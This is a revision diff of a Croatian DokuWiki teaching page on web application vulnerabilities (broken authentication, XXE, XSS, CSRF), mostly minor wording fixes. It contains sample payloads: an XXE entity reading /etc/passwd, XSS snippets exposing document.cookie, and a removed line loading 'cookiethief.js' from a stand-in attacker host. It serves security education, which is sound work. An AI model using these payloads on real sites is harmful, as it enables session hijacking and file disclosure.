Dieses Dokuwiki verwendet ein von Anymorphic Webdesign erstelltes Thema.

Razlike

Slijede razlike između dviju inačica stranice.

Poveznica na ovu usporedbu

Starije izmjene na obje strane Starija izmjena
Novija izmjena 		Starija izmjena
racfor_wiki:mrezna_forenzika:ranjivosti_web_aplikacija [2020/01/10 00:07]
kfugosic [Nesigurno upravljanje osljetljivim podacima (Sensitive Data Exposure)] 		racfor_wiki:mrezna_forenzika:ranjivosti_web_aplikacija [2024/12/05 12:24] (trenutno)
Redak 42: Redak 42:
 - neotpornost na automatizirane napade (npr. credential stuffing)\\ - neotpornost na automatizirane napade (npr. credential stuffing)\\
 - slab ili nepostojeći oporavak lozinke\\ - slab ili nepostojeći oporavak lozinke\\
-- spremanje lozinke u čistom (eng. plain text) obliku ili slabim hashiranjem\\+- spremanje lozinke u čistom (eng. plain text) obliku ili slabim sažimanjem\\
 - nepostojeća višestruka autorizacija (eng. Multi-factor authentication) - nepostojeća višestruka autorizacija (eng. Multi-factor authentication)
  
Redak 67: Redak 67:
 Slika 3) Spam uzrokovan curenjem podataka Slika 3) Spam uzrokovan curenjem podataka
  
-Preporučuje se da na različitim mjestima koriste različite lozinke, te da se sumnjive stranice izbjegavaju. Stranice poput [[http://haveibeenpwned.com|http://haveibeenpwned.com]] omogućuju provjeru kompromitiranosti određene email adrese.+Preporučuje se da na različitim mjestima koriste različite lozinke (upravo radi toga napad na prethodnoj slici nije bio uspješan), te da se sumnjive stranice izbjegavaju. Stranice poput [[http://haveibeenpwned.com|http://haveibeenpwned.com]] omogućuju provjeru kompromitiranosti određene email adrese.
  
 Od 2017. godine ova se ranjivost nalazi na trećem mjestu OWASP Top 10 ljestvice. Od 2017. godine ova se ranjivost nalazi na trećem mjestu OWASP Top 10 ljestvice.
Redak 74: Redak 74:
 ===== Vanjski XML entiteti (XXE) ===== ===== Vanjski XML entiteti (XXE) =====
  
-**XXE ** (XML External Entity), često nazivan i **XML umetanje** (eng. XML injection), je napad usmjeren na web aplikacije koje obrađuju XML tipove podataka.Napad je najlakše objasniti sljedećim primjerom gdje želimo dodati novi blog unos na nekoj web stranici:+**XXE ** (XML External Entity), često nazivan i **XML umetanje** (eng. XML injection), je napad usmjeren na web aplikacije koje obrađuju XML tipove podataka. Napad je najlakše objasniti sljedećim primjerom gdje želimo dodati novi blog unos na nekoj web stranici:
 <code> <code>
 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
Redak 101: Redak 101:
 </code> </code>
  
-Važno je obratiti pozornost na treću liniju u kojoj se definira vanjski entitet (eng. external entity), odnosno u kojoj se sadržaj datoteke /etc/passwd učitava u entitet xxe.Ovaj puta od stranice dobivamo odgovor:+Važno je obratiti pozornost na treću liniju u kojoj se definira vanjski entitet (eng. external entity), odnosno u kojoj se sadržaj datoteke /etc/passwd učitava u entitet xxe. Ovaj puta od stranice dobivamo odgovor:
  
 <code> <code>
Redak 163: Redak 163:
 <code> <code>
 "%3cscript%3e%61lert(document.cookie)%3c/script%3e "%3cscript%3e%61lert(document.cookie)%3c/script%3e
-<a href="http://vulnerable-web.com?q=news<\script%20src=”http://bad-website.com/cookiethief.js”">Unsubscribe</a> 
 <body onload=alert(document.cookie)> <body onload=alert(document.cookie)>
 <b onmouseover=alert(document.cookie)>click me!</b> <b onmouseover=alert(document.cookie)>click me!</b>
Redak 199: Redak 198:
 Ako korisnik na nju klikne, promjenit će svoj password u password123. Sada zamislimo da neka druga stranica nudi opciju slanja novca i kakve bi posljedice donesao ovakav propust u kojem napadač jednostavnim slanjem posebno složene poveznice može nekome ukrasti novac. Ako korisnik na nju klikne, promjenit će svoj password u password123. Sada zamislimo da neka druga stranica nudi opciju slanja novca i kakve bi posljedice donesao ovakav propust u kojem napadač jednostavnim slanjem posebno složene poveznice može nekome ukrasti novac.
  
-Ova ranjivost od 2017. godine više ne spada u OWASP Top 10, a razni okviri poput Spring Security-a imaju uključenu zaštitu protiv istoga u inicijalnim postavkama. Zaštita se sastoji od **CSRF tokena** odnosno jedinstvene, tajne i pseudonasumične vrijednosti koja se web sjedištu predaje unutar HTTP zahtjeva. U kontekstu prethodnog primjera, dovoljno bi bilo dodati još jedno ulazno polje:+Ova ranjivost od 2017. godine više ne spada u OWASP Top 10, a razni okviri poput Spring Security-a imaju uključenu zaštitu protiv istoga u inicijalnim postavkama. Zaštita se sastoji od **CSRF tokena** odnosno jedinstvene, tajne i pseudoslučajne vrijednosti koja se web sjedištu predaje unutar HTTP zahtjeva. U kontekstu prethodnog primjera, dovoljno bi bilo dodati još jedno ulazno polje:
 <code> <code>
 <input type="hidden" name="csrf-token" value="d7H8juiKjdDe3r8Uijhg987aVBN" /> <input type="hidden" name="csrf-token" value="d7H8juiKjdDe3r8Uijhg987aVBN" />
 </code> </code>
  
-Ovo je rješenje je dobro, no i dalje potencijalno ranjivo XSS napadom.OWASP “šalabahter” za prevenciju CSRF ranjivosti dostupan je na sljedećoj [[https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html|poveznici]].+Ovo je rješenje je dobro, no i dalje potencijalno ranjivo XSS napadom. 
 + 
 +OWASP “šalabahter” za prevenciju CSRF ranjivosti dostupan je na sljedećoj [[https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html|poveznici]].
  
  
racfor_wiki/mrezna_forenzika/ranjivosti_web_aplikacija.1578614858.txt.gz · Zadnja izmjena: 2024/12/05 12:23 (vanjsko uređivanje)
Dieses Dokuwiki verwendet ein von Anymorphic Webdesign erstelltes Thema.
CC Attribution-Share Alike 4.0 International
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0